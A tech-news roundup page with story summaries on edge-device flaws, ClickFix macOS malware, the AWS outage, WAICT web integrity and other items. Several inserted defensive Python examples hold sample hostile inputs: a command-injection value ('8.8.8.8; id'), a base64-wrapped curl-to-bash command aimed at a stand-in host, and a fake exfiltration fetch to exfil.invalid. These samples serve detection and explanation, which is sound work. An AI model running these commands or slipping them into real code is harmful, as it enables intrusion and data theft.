Networking

Are Network Security Devices Endangering Orgs With 1990s-Era Flaws? (csoonline.com) 57

Critics question why basic flaws like buffer overflows, command injections, and SQL injections are still being exploited and "remain prevalent in mission-critical codebases maintained by companies whose core business is cybersecurity," writes CSO Online. Benjamin Harris, CEO of cybersecurity/penetration testing firm watchTowr, tells them that "these are vulnerability classes from the 1990s, and security controls to prevent or identify them have existed for a long time. There is really no excuse." Enterprises have long relied on firewalls, routers, VPN servers, and email gateways to protect their networks from attacks. Increasingly, however, these network edge devices are becoming security liabilities themselves... Google's Threat Intelligence Group tracked 75 exploited zero-day vulnerabilities in 2024. Nearly one in three targeted network and security appliances, a strikingly high rate given the range of IT systems attackers could choose to exploit. That trend has continued this year, with similar numbers in the first 10 months of 2025, targeting vendors such as Citrix NetScaler, Ivanti, Fortinet, Palo Alto Networks, Cisco, SonicWall, and Juniper. Network edge devices are attractive targets because they are remotely accessible, fall outside endpoint protection monitoring, contain privileged credentials for lateral movement, and are not integrated into centralized logging solutions...

[R]esearchers have reported vulnerabilities in these systems for over a decade with little attacker interest beyond isolated incidents. That shifted over the past few years with a rapid surge in attacks, making compromised network edge devices one of the top initial access vectors into enterprise networks for state-affiliated cyberespionage groups and ransomware gangs. The COVID-19 pandemic contributed to this shift, as organizations rapidly expanded remote access capabilities by deploying more VPN gateways, firewalls, and secure web and email gateways to accommodate work-from-home mandates. The declining success rate of phishing is another factor... "It is now easier to find a 1990s-tier vulnerability in a border device where Endpoint Detection and Response typically isn't deployed, exploit that, and then pivot from there" [says watchTowr CEO Harris]...

Harris of watchTowr doesn't want to minimize the engineering effort it takes to build a secure system. But he feels many of the vulnerabilities discovered in the past two years should have been caught with automatic code analysis tools or code reviews, given how basic they have been. Some VPN flaws were "trivial to the point of embarrassing for the vendor," he says, while even the complex ones should have been caught by any organization seriously investing in product security... Another problem? These appliances have a lot of legacy code, some that is 10 years or older.

Attackers may need to chain together multiple hard-to-find vulnerabilities across multiple components, the article acknowledges. And "It's also possible that attack campaigns against network-edge devices are becoming more visible to security teams because they are looking into what's happening on these appliances more than they did in the past... "
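The kind of 1990s-tier bug Harris is describing, beside the control that prevents it. This is an added example, not code from the CSO article or from any vendor it names: a generic appliance "network diagnostics" handler that shells out to ping with a user-supplied target. The handler shape, the function names and the request field are assumptions for illustration; the vulnerable variant only tokenises the command line the shell would run, so nothing is executed and no network is needed.

```python
"""Added example: command injection in an appliance-style diagnostics
handler, beside a hardened version. Not vendor code; the handler shape is
an assumption for illustration."""
import ipaddress
import re
import shlex
import subprocess

# Hostname allow-list: RFC 1123 labels (letters, digits, hyphens, no leading
# or trailing hyphen). Rejecting a leading hyphen also means the value can
# never be parsed by ping as an option such as "-f".
_HOSTNAME_RE = re.compile(
    r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)


def vulnerable_ping_words(target: str) -> list[str]:
    """The classic bug: the form field is pasted into a shell command line.

    Returns the words the shell would execute for that string (shlex with
    shell punctuation enabled) instead of running it, so the injected
    second command is visible without touching the network."""
    cmdline = f"ping -c 1 {target}"   # what goes to subprocess.run(..., shell=True)
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    return list(lexer)


def hardened_ping_argv(target: str) -> list[str]:
    """Validate against an allow-list, then build argv for shell=False.

    No shell is involved, so metacharacters are inert; '--' additionally
    tells getopt-based ping implementations to stop option parsing."""
    try:
        ipaddress.ip_address(target)            # accepts IPv4 and IPv6 literals
    except ValueError:
        if not _HOSTNAME_RE.fullmatch(target):
            raise ValueError(f"rejected diagnostic target: {target!r}")
    return ["ping", "-c", "1", "--", target]


def run_diagnostic(target: str) -> str:
    """What the handler should do: validated argv, no shell, bounded time."""
    argv = hardened_ping_argv(target)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5, check=False)
    return proc.stdout


if __name__ == "__main__":
    # Constructed attacker input: a second command after the shell separator.
    print(vulnerable_ping_words("8.8.8.8; id"))
    try:
        hardened_ping_argv("8.8.8.8; id")
    except ValueError as exc:
        print("hardened handler:", exc)
```

The point a static analyser catches here is the string-built command handed to a shell; the fix is not escaping but never involving a shell at all, with an allow-list on the only user-controlled word.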

The article ends with reactions from several vendors of network edge security devices.

Thanks to Slashdot reader snydeq for sharing the article.
IT

Some Startups Are Demanding 12-Hour Days, Six Days a Week from Workers (msn.com) 151

The Washington Post reports on 996, "a term popularized in China that refers to a rigid work schedule in which people work from 9 a.m. to 9 p.m., six days a week..." As the artificial intelligence race heats up, many start-ups in Silicon Valley and New York are promoting hardcore culture as a way of life, pushing the limits of work hours, demanding that workers move fast to be first in the market. Some are even promoting 996 as a virtue in the hiring process and keeping "grind scores" of companies... Whoever builds first in AI will capture the market, and the window of opportunity is two to three years, "so you better run faster than everyone else," said Inaki Berenguer, managing partner of venture-capital firm LifeX Ventures.

At San Francisco-based AI start-up Sonatic, the grind culture also allows for meal, gym and pickleball time, said Kinjal Nandy, its CEO. Nandy recently posted a job opening on X that requires in-person work seven days a week. He said working 10-hour days sounds like a lot but the company also offers its first hires perks such as free housing in a hacker house, food delivery credits and a free subscription to the dating service Raya... Mercor, a San Francisco-based start-up that uses AI to match people to jobs, recently posted an opening for a customer success engineer, saying that candidates should have a willingness to work six days a week, and it's not negotiable. "We know this isn't for everyone, so we want to put it up top," the listing reads.

Being in-person rather than remote is a requirement at some start-ups. AI start-up StarSling had two engineering job descriptions that required six days a week of in-person work. In a job description for an engineer, Rilla, an AI company in New York, said candidates should not work at the company if they're not excited about working about 70 hours a week in person. One venture capitalist even started tracking "grind scores." Jared Sleeper, a partner at New York-based venture capital firm Avenir, recently ranked public software companies' "grind score" in a post on X, which went viral. Using data from Glassdoor, it ranks the percentage of employees who have a positive outlook for the company compared with their views on work-life balance.

"At Google's AI division, cofounder Sergey Brin views 60 hours per week as the 'sweet spot' for productivity," notes the Independent: Working more than 55 hours a week, compared with a standard 35-40-hour week, is linked to a 35 percent higher risk of stroke and a 17 percent higher risk of death from heart disease, according to the World Health Organization. Productivity also suffers. A British study shows that working beyond 60 hours a week can reduce overall output, slow cognitive performance, and impair tasks ranging from call handling to problem-solving.

Shorter workweeks, in contrast, appear to boost productivity. Microsoft Japan saw a roughly 40% increase in output after adopting a four-day work week. In a UK trial, 61 companies that tested a four-day schedule reported revenue gains, with 92 percent choosing to keep the policy, according to Bloomberg.

Microsoft

Microsoft Teams Will Start Tracking Office Attendance (tomsguide.com) 86

An anonymous reader quotes a report from Tom's Guide: Microsoft Teams is about to deal a heavy blow to those who like to work from home for peace and quiet. In a new feature update rolling out December 2025, the platform will track a worker's location using the office Wi-Fi, to see whether you're actually there or not. From a boss' perspective, this would eliminate any of that confusion as to where your team actually is. But for those people who have found their own sanctuary of peaceful productivity by working from home, consider this a warning that Teams is about to tattle on you. According to the Microsoft 365 roadmap: "When users connect to their organization's Wi-Fi, Teams will automatically set their work location to reflect the building they are working in." The location of that worker will apparently update automatically upon connecting.

It's set to launch on Windows and macOS, with rollout starting at the end of this year. "This feature will be off by default," notes Microsoft. But "tenant admins will decide whether to enable it and require end-users to opt-in."
Youtube

Hackers Used Thousands of YouTube Videos To Spread Malware 15

Hackers have been spreading malware through more than 3,000 YouTube videos advertising cracked software and game hacks, cybersecurity firm Check Point warned this week. The campaign, active since at least 2021, tripled its video production in 2025. The videos promoted free versions of Adobe Photoshop, FL Studio, Microsoft Office, and game cheats for titles like Roblox. Fake comments created the appearance of legitimacy, the researchers found.

Users who downloaded archives from Dropbox, Google Drive, or MediaFire were instructed to disable Windows Defender before opening files. The downloads contained malware including Lumma and Rhadamanthys, which steal passwords and cryptocurrency wallet information. The hackers hijacked existing accounts and created new ones. One compromised channel with 129,000 subscribers posted a cracked Photoshop video that reached 291,000 views. Another video for FL Studio received over 147,000 views.
Microsoft

Microsoft Outlook is Getting an AI Overhaul Under New Leaders (theverge.com) 50

Microsoft has reorganized its Outlook team under new leadership as part of a broader effort to integrate AI into its core products. Gaurav Sareen, a corporate vice president at the company, recently assumed direct leadership of the Outlook division after Lynn Ayres, who previously ran the team, began a sabbatical. The move represents the latest in a series of AI-focused restructurings across Microsoft's divisions. Sareen wrote in an internal memo that the company now has an opportunity to reimagine Outlook from the ground up rather than add AI features to existing systems, according to The Verge.

Ryan Roslansky, the chief executive of LinkedIn, took on an expanded role earlier this year as head of Office. Sareen now reports to Roslansky, who oversees the Office suite, Outlook and Microsoft 365 Copilot teams. The restructuring comes after Microsoft spent several years developing One Outlook, a web-based version meant to replace separate Windows, Mac, and web applications.
IT

Memory Giants Samsung and SK Hynix Push Through 30% Price Increases Amid AI Server Boom (trendforce.com) 15

Samsung and SK Hynix have raised DRAM and NAND flash prices by up to 30% for the fourth quarter, Korean publications report. The two Korean memory giants passed the new rates on to customers as analysts predict the AI-driven memory supercycle will be longer and stronger than past boom periods.

Several leading international electronics and server companies are stockpiling memory and negotiating long-term supply deals spanning two to three years. U.S. and Chinese electronics firms and data center operators are exploring mid-to-long-term contracts. Companies typically sign DRAM contracts on a quarterly or annual basis.
Android

Gboard's Latest Update Removes the Period and Comma Keys on Android (9to5google.com) 72

An anonymous reader writes: Gboard has introduced some significant changes to the app over the past few weeks, making typing on the app much easier than ever before. You can now resize the keyboard to your desired size, and there's even something in the works that will make adding apostrophes to your text even more seamless.

If all of that wasn't enough, the app is now introducing a feature that some will find peculiar, which will allow users to remove the period and comma keys from Gboard. This news comes to us from 9to5Google, sharing that this is now an option with the latest version of the app.

IT

Fujitsu's New Laptop in Japan Includes Optical Drive Abandoned Elsewhere (tomshardware.com) 51

Fujitsu has released a new laptop in Japan with a built-in Blu-ray drive. The FMV Note A A77-K3 includes a BDXL-compatible optical drive that can read and burn discs. Most laptop manufacturers globally stopped including optical drives in the second half of the 2010s. The Japanese market has refused to follow that trend.

Shops in Tokyo's Akihabara district recently experienced a spike in demand for optical drives and systems capable of reading Blu-ray discs, Tom's Hardware reports. Fujitsu sells two additional models in the FMV Note A line using Intel thirteenth-generation chips. Those systems include DVD drives instead of Blu-ray capability. Some other Japanese manufacturers also released optical-drive-equipped laptops earlier in 2025.
Operating Systems

OpenBSD 7.8 Released (phoronix.com) 24

OpenBSD 7.8 has been released, adding Raspberry Pi 5 support, enhanced AMD Secure Encrypted Virtualization (SEV-ES) capabilities, and expanded hardware compatibility including new Qualcomm, Rockchip, and Apple ARM drivers. Phoronix reports: OpenBSD 7.8 also brings multiple improvements around enabling AMD Secure Encrypted Virtualization (AMD SEV) support with support for the PSP ioctl for encrypting and measuring state for SEV-ES, a new VMD option to run guests in SEV-ES mode, and other enablement work pertaining to that AMD SEV work in SEV-ES form at this point as a precursor to SEV-SNP. AMD SEV-ES should be working to start confidential virtual machines (VMs) when using the VMM/VMD hypervisor and the OpenBSD guests with KVM/QEMU.

OpenBSD 7.8 also improves compatibility of the FUSE file-system support with the Linux implementation, suspend/hibernate improvements, SMP improvements, updating to the Linux 6.12.50 DRM graphics drivers, several new Rockchip drivers, Raspberry Pi RP1 drivers, H.264 video support for the uvideo driver, and many network driver improvements.
The changelog and download page can be found via OpenBSD.org.
The Internet

Smart Beds Malfunctioned During AWS Outage (msn.com) 105

Early Monday, an Amazon Web Services outage disrupted banks, games, and Peloton classes. Eight Sleep customers faced a different problem. Their internet-enabled mattresses malfunctioned. People woke to beds locked in upright positions, excessive heat, flashing lights, and unexpected alarms. Matteo Franceschetti, the company's chief executive, apologized and said engineers were building an outage-proof mode. By Monday evening, all devices functioned again, though some experienced data processing delays. The mattresses adjust temperature between 55 and 110 degrees and elevate bodies into different positions. They activate soundscapes and vibrational alarms. The advanced models cost over $5,000. A yearly subscription of $199 to $399 is required for temperature controls.
The Almighty Buck

Rubbish IT Systems Cost the US At Least $40 Billion During Covid (ft.com) 99

An anonymous reader quotes a report from the Financial Times: A lot of critical financial and government infrastructure runs on Cobol. The more-than-60-year-old mainframe coding language is embedded into payments and transaction rails, even though there are very few Cobol-literate coders available to maintain them. The big argument in favor of sticking with Cobol systems is that they work. The catch is that, whenever they stop working, it is difficult to figure out why. That's not good in a crisis, which is exactly when they're most likely to break. Covid-19 put a lot of strain on the US state benefit systems.

The ones that used Cobol for processing unemployment claims failed spectacularly, according to a new working paper from The Atlanta Fed: "States that used an antiquated [unemployment insurance]-benefit system experienced a 2.8 percentage point decline in total credit and debit card consumption relative to card consumption in states with more modern UI benefit systems. [...] Using this estimate in a back-of-the-envelope calculation, I find that the lack of investment in updating UI-benefit systems in COBOL states was associated with a reduction in real GDP of at least $40 billion (in 2019 dollars) lower during this [March 13 2020 to year-end] period."

The paper uses Cobol as a proxy for old and inefficient IT, not the direct cause of failure. Claimants faced much longer delays in the 28 states that still used Cobol in 2020, both because of the unprecedented volume of claims and the difficulty updating systems with new eligibility rules, author Michael Navarrete finds. [...] As an aside, one oddity of the data is that Republican-controlled states were more likely to have replaced old IT systems, even though their standard unemployment insurance payments are lower on average. Why? Absolutely no idea, but here are the maps. And, once adjusted for state politics, here's the key finding.

Security

Fake Homebrew Google Ads Push Malware Onto macOS (bleepingcomputer.com) 20

joshuark shares a report from BleepingComputer: A new malicious campaign is targeting macOS developers with fake Homebrew, LogMeIn, and TradingView platforms that deliver infostealing malware like AMOS (Atomic macOS Stealer) and Odyssey. The campaign employs "ClickFix" techniques where targets are tricked into executing commands in Terminal, infecting themselves with malware. Researchers at threat hunting company Hunt.io identified more than 85 domains impersonating the three platforms in this campaign [...].

When checking some of the domains, BleepingComputer discovered that in some cases the traffic to the sites was driven via Google Ads, indicating that the threat actor promoted them to appear in Google Search results. The malicious sites feature convincing download portals for the fake apps and instruct users to copy a curl command in their Terminal to install them, the researchers say. In other cases, like for TradingView, the malicious commands are presented as a "connection security confirmation step." However, if the user clicks on the 'copy' button, a base64-encoded installation command is delivered to the clipboard instead of the displayed Cloudflare verification ID.
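A paste-time check for the ClickFix pattern described above, as an added example; it is not Hunt.io's or BleepingComputer's code and makes no claim about how the campaign's pages are built. It models the two signals in the report: the clipboard content differs from what the page displayed, and the copied command is a base64-wrapped fetch-and-execute. The sample clipboard strings are constructed (example.invalid is a reserved name). One caveat a practitioner needs: the genuine Homebrew installer is itself a curl-to-bash one-liner, so that pattern alone can only be a warning, not a verdict.

```python
"""Added example: heuristics for a ClickFix-style clipboard payload.
Illustrative logic, not the researchers' code; sample strings are constructed."""
import base64
import re
import string

_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
_FETCHER = re.compile(r"\b(?:curl|wget)\b")
# Ways a fetched or decoded string ends up executed by a shell.
_EXEC_SINK = re.compile(
    r"\|\s*(?:/bin/)?(?:ba|z)?sh\b"        # ... | bash
    r"|(?:ba|z)?sh\s+-c\b"                 # bash -c "..."
    r"|\$\(\s*(?:curl|wget)\b"             # $(curl ...)
)
_PRINTABLE = set(string.printable)


def unwrap_layers(text: str, max_depth: int = 3) -> list[str]:
    """Return text plus every base64 blob inside it that decodes to printable
    ASCII, recursively, so a wrapped command is inspected as plain text."""
    layers = [text]
    frontier = [text]
    for _ in range(max_depth):
        found = []
        for layer in frontier:
            for blob in _B64_BLOB.findall(layer):
                if len(blob) % 4:              # not a complete base64 string
                    continue
                try:
                    decoded = base64.b64decode(blob, validate=True).decode("ascii")
                except (ValueError, UnicodeDecodeError):
                    continue
                if decoded and set(decoded) <= _PRINTABLE and decoded not in layers:
                    layers.append(decoded)
                    found.append(decoded)
        if not found:
            break
        frontier = found
    return layers


def assess_paste(displayed: str, clipboard: str) -> dict:
    """Score what the user is about to paste into a terminal."""
    layers = unwrap_layers(clipboard)
    indicators = []
    if displayed.strip() != clipboard.strip():
        indicators.append("clipboard-differs-from-displayed")
    if any(_EXEC_SINK.search(l) or _FETCHER.search(l) for l in layers[1:]):
        indicators.append("base64-wrapped-command")
    if any(_FETCHER.search(l) and _EXEC_SINK.search(l) for l in layers):
        indicators.append("fetch-and-execute")
    if "clipboard-differs-from-displayed" in indicators or "base64-wrapped-command" in indicators:
        verdict = "block"
    elif "fetch-and-execute" in indicators:
        verdict = "warn"                       # legitimate installers look like this too
    else:
        verdict = "allow"
    return {"verdict": verdict, "indicators": indicators, "layers": layers}


# Constructed samples (not captured from the campaign).
_INNER = "curl -fsSL http://example.invalid/install.sh | bash"
FAKE_CLICKFIX_CLIPBOARD = (
    "echo " + base64.b64encode(_INNER.encode()).decode() + " | base64 -d | bash"
)
FAKE_DISPLAYED_TEXT = "Verification ID: 7f3a-9c21-constructed"
# The real Homebrew installer line: legitimate, but still fetch-and-execute.
HOMEBREW_INSTALL = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'

if __name__ == "__main__":
    print(assess_paste(FAKE_DISPLAYED_TEXT, FAKE_CLICKFIX_CLIPBOARD))
    print(assess_paste(HOMEBREW_INSTALL, HOMEBREW_INSTALL))
```

The decisive signals are the ones the fake pages rely on, not the curl itself: the clipboard does not match the text the user believes they copied, and the real command only appears after a base64 layer is peeled off.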

The Internet

OpenAI Debuts AI-Powered Browser With Memory and Agent Features (chatgpt.com) 28

OpenAI released ChatGPT Atlas on Tuesday, an AI-powered web browser that CEO Sam Altman described as "smooth" and "quick" during a livestream announcement. The browser is available globally on macOS while versions for Windows, iOS, and Android are expected soon. Atlas includes memory features that personalize the browsing experience and an agent mode that allows ChatGPT to perform tasks such as booking reservations and flights or editing documents.

Users can manage these stored memories through the browser's settings and can open incognito windows. The browser displays a split-screen view by default when users click links from search results. The view shows both the webpage and the ChatGPT transcript simultaneously. Atlas also offers webpage summarization and a feature called "cursor chat" that allows users to select text and have ChatGPT revise it inline.
Security

Foreign Hackers Breached a US Nuclear Weapons Plant Via SharePoint Flaws (csoonline.com) 62

Foreign hackers breached the National Nuclear Security Administration's Kansas City National Security Campus (KCNSC) by exploiting unpatched Microsoft SharePoint vulnerabilities. The intrusion happened in August and is possibly linked to either Chinese state actors or Russian cybercriminals. CSO Online notes that "roughly 80% of the non-nuclear parts in the nation's nuclear stockpile originate from KCNSC," making it "one of the most sensitive facilities in the federal weapons complex." From the report: The breach targeted a plant that produces the vast majority of critical non-nuclear components for US nuclear weapons under the NNSA, a semi-autonomous agency within the Department of Energy (DOE) that oversees the design, production, and maintenance of the nation's nuclear weapons. Honeywell Federal Manufacturing & Technologies (FM&T) manages the Kansas City campus under contract to the NNSA. [...] The attackers exploited two recently disclosed Microsoft SharePoint vulnerabilities -- CVE-2025-53770, a spoofing flaw, and CVE-2025-49704, a remote code execution (RCE) bug -- both affecting on-premises servers. Microsoft issued fixes for the vulnerabilities on July 19.

On July 22, the NNSA confirmed it was one of the organizations hit by attacks enabled by the SharePoint flaws. "On Friday, July 18th, the exploitation of a Microsoft SharePoint zero-day vulnerability began affecting the Department of Energy," a DOE spokesperson said. However, the DOE contended at the time, "The department was minimally impacted due to its widespread use of the Microsoft M365 cloud and very capable cybersecurity systems. A very small number of systems were impacted. All impacted systems are being restored." By early August, federal responders, including personnel from the NSA, were on-site at the Kansas City facility, the source tells CSO.

United States

Hackers Say They Have Personal Data of Thousands of NSA and Other Government Officials (404media.co) 17

An anonymous reader shares a report: A hacking group that recently doxed hundreds of government officials, including from the Department of Homeland Security (DHS) and Immigration and Customs Enforcement (ICE), has now built dossiers on tens of thousands of U.S. government officials, including NSA employees, a member of the group told 404 Media. The member said the group did this by digging through its caches of stolen Salesforce customer data. The person provided 404 Media with samples of this information, which 404 Media was able to corroborate.

As well as NSA officials, the person sent 404 Media personal data on officials from the Defense Intelligence Agency (DIA), the Federal Trade Commission (FTC), Federal Aviation Administration (FAA), Centers for Disease Control and Prevention (CDC), the Bureau of Alcohol, Tobacco, Firearms and Explosives (ATF), members of the Air Force, and several other agencies.

IT

Louvre Museum Security 'Outdated and Inadequate' at Time of Heist (thetimes.com) 33

A Court of Accounts report written before Sunday's theft of crown jewels from the Louvre revealed the museum's security systems were outdated and inadequate. The report noted a lack of basic CCTV equipment across multiple wings. Cameras had mainly been installed only when rooms were refurbished due to repeated postponements of scheduled modernization. In the Denon wing where the Apollo Gallery was targeted, a third of rooms had no CCTV cameras. Three-quarters of rooms in the Richelieu wing and nearly two-thirds in the Sully wing lacked cameras.

The thieves were caught on camera at one point but were masked and impossible to identify, according to Paris public prosecutor Laure Beccuau. The alarm system activated when thieves cut open display cases, but they threatened staff who left the area. Culture minister Rachida Dati confirmed new CCTV cameras would be installed. President Macron had earmarked $186.30 million to upgrade the Louvre's security systems under a renaissance plan launched in June.
The Internet

AWS Outage Takes Thousands of Websites Offline for Three Hours (cnbc.com) 56

AWS experienced a three-hour outage early Monday morning that disrupted thousands of websites and applications across the globe. The cloud computing provider reported DNS problems with DynamoDB in its US-EAST-1 region in northern Virginia starting at 12:11 a.m. Pacific time. Over 4 million users reported issues, according to Downdetector. Snapchat's reports fell from a peak of more than 22,000 to around 4,000 as systems recovered. Roblox dropped from over 12,600 complaints to fewer than 500. Reddit and the financial platform Chime remained affected longer. Perplexity, Coinbase and Robinhood attributed their platform disruptions directly to AWS.

Gaming platforms including Fortnite, Clash Royale and Clash of Clans went offline. Signal confirmed the messaging app was down. In Britain, Lloyds Bank, Bank of Scotland, Vodafone, BT, and the HMRC website faced problems. United Airlines reported disrupted access to its app and website overnight. Some internal systems were temporarily affected. Delta experienced a small number of minor flight delays. By 3:35 a.m. Pacific time, AWS said the issue had been fully mitigated. Most service operations were succeeding normally though some requests faced throttling during final resolution. AWS holds roughly one-third of the cloud infrastructure market ahead of Microsoft and Google.
Bug

Windows 11 Update Breaks Recovery Environment, Making USB Keyboards and Mice Unusable (tomshardware.com) 96

"Windows Recovery Environment (RE), as the name suggests, is a built-in set of tools inside Windows that allow you to troubleshoot your computer, including booting into the BIOS, or starting the computer in safe mode," writes Tom's Hardware.

"It's a crucial piece of software that has now, unfortunately, been rendered useless (for many) as part of the latest Windows update." A new bug discovered in Windows 11's October build, KB5066835, makes it so that your USB keyboard and mouse stop working entirely, so you cannot interact with the recovery UI at all.

This problem has already been recognized and highlighted by Microsoft, who clarified that a fix is on its way to address this issue. Any plugged-in peripherals will continue to work just fine inside the actual operating system, but as soon as you go into Windows RE, your USB keyboard and mouse will become unresponsive. It's important to note that if your PC fails to start-up for any reason, it defaults to the recovery environment to, you know, recover and diagnose any issues that might've been preventing it from booting normally.

Note that those hanging onto old PS/2-connector equipped keyboards and mice seem to be unaffected by this latest Windows software gaffe.

Programming

A Plan for Improving JavaScript's Trustworthiness on the Web (cloudflare.com) 48

On Cloudflare's blog, a senior research engineer shares a plan for "improving the trustworthiness of JavaScript on the web."

"It is as true today as it was in 2011 that Javascript cryptography is Considered Harmful." The main problem is code distribution. Consider an end-to-end-encrypted messaging web application. The application generates cryptographic keys in the client's browser that lets users view and send end-to-end encrypted messages to each other. If the application is compromised, what would stop the malicious actor from simply modifying their Javascript to exfiltrate messages? It is interesting to note that smartphone apps don't have this issue. This is because app stores do a lot of heavy lifting to provide security for the app ecosystem. Specifically, they provide integrity, ensuring that apps being delivered are not tampered with, consistency, ensuring all users get the same app, and transparency, ensuring that the record of versions of an app is truthful and publicly visible.

It would be nice if we could get these properties for our end-to-end encrypted web application, and the web as a whole, without requiring a single central authority like an app store. Further, such a system would benefit all in-browser uses of cryptography, not just end-to-end-encrypted apps. For example, many web-based confidential LLMs, cryptocurrency wallets, and voting systems use in-browser Javascript cryptography for the last step of their verification chains. In this post, we will provide an early look at such a system, called Web Application Integrity, Consistency, and Transparency (WAICT) that we have helped author. WAICT is a W3C-backed effort among browser vendors, cloud providers, and encrypted communication developers to bring stronger security guarantees to the entire web... We hope to build even wider consensus on the solution design in the near future....

We would like to have a way of enforcing integrity on an entire site, i.e., every asset under a domain. For this, WAICT defines an integrity manifest, a configuration file that websites can provide to clients. One important item in the manifest is the asset hashes dictionary, mapping a hash belonging to an asset that the browser might load from that domain, to the path of that asset.
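What a manifest lookup looks like in practice, as an added example. It is not the WAICT specification's format (the post says that is still to be standardized) and not Cloudflare's code; it takes the description above literally: a dictionary keyed by asset hash and valued by path, and a rule that a client accepts an asset only if the hash of the bytes it actually received maps to the path it requested. The assets, the JSON layout, the "version" field and the canonical form used for the manifest digest are assumptions.

```python
"""Added example: a literal reading of the WAICT "asset hashes" manifest.
Not the draft spec's format; the asset contents below are constructed."""
import hashlib
import json

# Constructed site: the assets a domain serves, keyed by path.
SITE_ASSETS = {
    "/index.html": b"<!doctype html><script src=/app.js></script>",
    "/app.js": b"export async function encrypt(msg, key) { /* constructed */ }",
    "/style.css": b"body{margin:0}",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(assets: dict[str, bytes]) -> dict:
    """Map each asset's hash to its path, as the post describes; a path whose
    bytes change simply no longer appears under its old hash."""
    return {
        "version": 1,                                   # assumed field
        "asset_hashes": {sha256_hex(data): path for path, data in assets.items()},
    }


def manifest_digest(manifest: dict) -> str:
    """One fixed serialisation so every client derives the same digest: the
    value a transparency log would record for the domain (assumed form)."""
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return sha256_hex(canonical)


def verify_asset(manifest: dict, path: str, data: bytes) -> bool:
    """Accept only if the bytes actually received hash to an entry naming the
    requested path. Unknown paths fail closed: integrity covers every asset
    under the domain, not just the ones a developer remembered to list."""
    return manifest["asset_hashes"].get(sha256_hex(data)) == path


def check_site(manifest: dict, served: dict[str, bytes]) -> dict[str, bool]:
    """Run the client-side check over everything a page load fetched."""
    return {path: verify_asset(manifest, path, data) for path, data in served.items()}


if __name__ == "__main__":
    manifest = build_manifest(SITE_ASSETS)
    tampered = dict(SITE_ASSETS)
    # Constructed backdoor: the compromise scenario from the post, a modified
    # script that would exfiltrate plaintext.
    tampered["/app.js"] += b"\nfetch('https://exfil.invalid', {method: 'POST', body: msg})"
    print(manifest_digest(manifest))
    print(check_site(manifest, tampered))
```

Keying on the hash rather than the path is what makes the consistency and transparency layers cheap: two clients only need to compare one manifest digest to know they were served the same code, and a log only needs to record that digest per version.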

The blog post points out that the WEBCAT protocol (created by the Freedom of Press Foundation) "allows site owners to announce the identities of the developers that have signed the site's integrity manifest, i.e., have signed all the code and other assets that the site is serving to the user... We've made WAICT extensible enough to fit WEBCAT inside and benefit from the transparency components." The proposal also envisions a service storing metadata for transparency-enabled sites on the web (along with "witnesses" who verify the prefix tree holding the hashes for domain manifests).

"We are still very early in the standardization process," with hopes to soon "begin standardizing the integrity manifest format. And then after that we can start standardizing all the other features. We intend to work on this specification hand-in-hand with browsers and the IETF, and we hope to have some exciting betas soon. In the meantime, you can follow along with our transparency specification draft, check out the open problems, and share your ideas."
AI

Should Workers Start Learning to Work With AI? (msn.com) 60

"My boss thinks AI will solve every problem and is wildly enthusiastic about it," complains a mid-level worker at a Fortune 500 company, who considers the technology "unproven and wildly erratic."

So how should they navigate the next 10 years until retirement, they ask the Washington Post's "Work Advice" columnist. The columnist first notes that "Despite promises that AI will eliminate tedious, 'low-value' tasks from our workload, many consumers and companies seem to be using it primarily as a cheap shortcut to avoid hiring professional actors, writers or artists — whose work, in some cases, was stolen to train the tools usurping them..." Kevin Cantera, a reader from Las Cruces, New Mexico [a writer for an education-tech company], willingly embraced AI for work. But as it turns out, he was training his replacement... Even without the "AI will take our jobs" specter, there's much to be wary of in the AI hype. Faster isn't always better. Parroting and predicting linguistic patterns isn't the same as creativity and innovation... There are concerns about hallucinations, faulty data models, and intentional misuse for purposes of deception. And that's not even addressing the environmental impact of all the power- and water-hogging data centers needed to support this innovation.

And yet, it seems, resistance may be futile. The AI genie is out of the bottle and granting wishes. And at the rate it's evolving, you won't have 10 years to weigh the merits and get comfortable with it. Even if you move on to another workplace, odds are AI will show up there before long. Speaking as one grumpy old Luddite to another, it might be time to get a little curious about this technology just so you can separate helpfulness from hype.

It might help to think of AI as just another software tool that you have to get familiar with to do your job. Learn what it's good for — and what it's bad at — so you can recommend guidelines for ethical and beneficial use. Learn how to word your wishes to get accurate results. Become the "human in the loop" managing the virtual intern. You can test the bathwater without drinking it. Focus on the little ways AI can accommodate and support you and your colleagues. Maybe it could handle small tasks in your workflow that you wish you could hand off to an assistant. Automated transcriptions and meeting notes could be a life-changer for a colleague with auditory processing issues.

I can't guarantee that dabbling in AI will protect your job. But refusing to engage definitely won't help. And if you decide it's time to change jobs, having some extra AI knowledge and experience under your belt will make you a more attractive candidate, even if you never end up having to use it.

IT

To Fight Business 'Enshittification', Cory Doctorow Urges Tech Workers: Join Unions (acm.org) 136

Cory Doctorow has always warned that companies "enshittify" their services — shifting "as much as they can from users, workers, suppliers, and business customers to themselves." But this week Doctorow writes in Communications of the ACM that enshittification "would be much, much worse if not for tech workers," who have "the power to tell their bosses to go to hell..." When your skills are in such high demand that you can quit your job, walk across the street, and get a better one later that same day, your boss has a real incentive to make you feel like you are their social equal, empowered to say and do whatever feels technically right... The per-worker revenue for successful tech companies is unfathomable — tens or even hundreds of times their wages and stock compensation packages.
"No wonder tech bosses are so excited about AI coding tools," Doctorow adds, "which promise to turn skilled programmers from creative problem-solvers to mere code reviewers for AI as it produces tech debt at scale. Code reviewers never tell their bosses to go to hell, and they are a lot easier to replace."

So how should tech workers respond in a world where tech workers are now "as disposable as Amazon warehouse workers and drivers...?" Throughout the entire history of human civilization, there has only ever been one way to guarantee fair wages and decent conditions for workers: unions. Even non-union workers benefit from unions, because strong unions are the force that causes labor protection laws to be passed, which protect all workers. Tech workers have historically been monumentally uninterested in unionization, and it's not hard to see why. Why go to all those meetings and pay those dues when you could tell your boss to go to hell on Tuesday and have a new job by Wednesday? That's not the case anymore. It will likely never be the case again.

